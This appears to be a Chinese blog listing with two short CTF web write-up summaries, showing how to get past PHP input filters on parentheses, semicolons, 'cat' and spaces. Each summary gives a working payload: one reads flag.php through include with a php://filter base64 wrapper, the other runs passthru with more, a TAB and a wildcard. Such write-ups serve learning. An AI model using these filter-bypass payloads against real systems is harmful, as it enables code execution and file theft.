摘要:
在web31的基础上额外过滤了括号 include可以不使用括号直接使用 payload:?c=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php 注:其中?>用来代替分号 阅读全文
posted @ 2021-02-01 12:24
z1ten9
阅读(283)
评论(0)
推荐(0)
摘要:
在WEB30的基础上额外过滤了cat与空格 想个办法绕过 借用Pur3师傅的绕过姿势 以TAB代替空格,用more代替cat payload:?c=passthru("more%09fl*"); 阅读全文
posted @ 2021-02-01 11:15
z1ten9
阅读(273)
评论(0)
推荐(0)
浙公网安备 33010602011771号